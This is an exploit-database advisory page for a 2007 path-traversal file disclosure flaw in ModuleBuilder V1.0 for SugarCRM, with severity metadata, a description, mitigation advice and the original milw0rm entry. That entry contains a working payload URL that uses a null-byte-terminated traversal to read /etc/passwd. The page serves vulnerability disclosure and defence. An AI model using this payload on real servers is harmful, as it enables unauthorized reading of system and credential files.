header-logo
Suggest Exploit
vendor:
ModuleBuilder
by:
Unknown
5.5
CVSS
MEDIUM
Remote File Disclosure
200
CWE
Product Name: ModuleBuilder
Affected Version From: ModuleBuilder V1.0
Affected Version To: ModuleBuilder V1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose arbitrary files on the server. By manipulating the 'file' parameter in the URL, an attacker can traverse directories and access sensitive files. In this case, the attacker is able to access the '/etc/passwd' file. This vulnerability was published on milw0rm.com on October 31, 2007.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and properly validate file paths before accessing files on the server. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
http://www.sugarforge.org/frs/download.php/1274/install_ModuleBuilderV1.0.zip
/modules/Builder/DownloadModule.php?file=../../../../../../../../etc/passwd%00

# milw0rm.com [2007-10-31]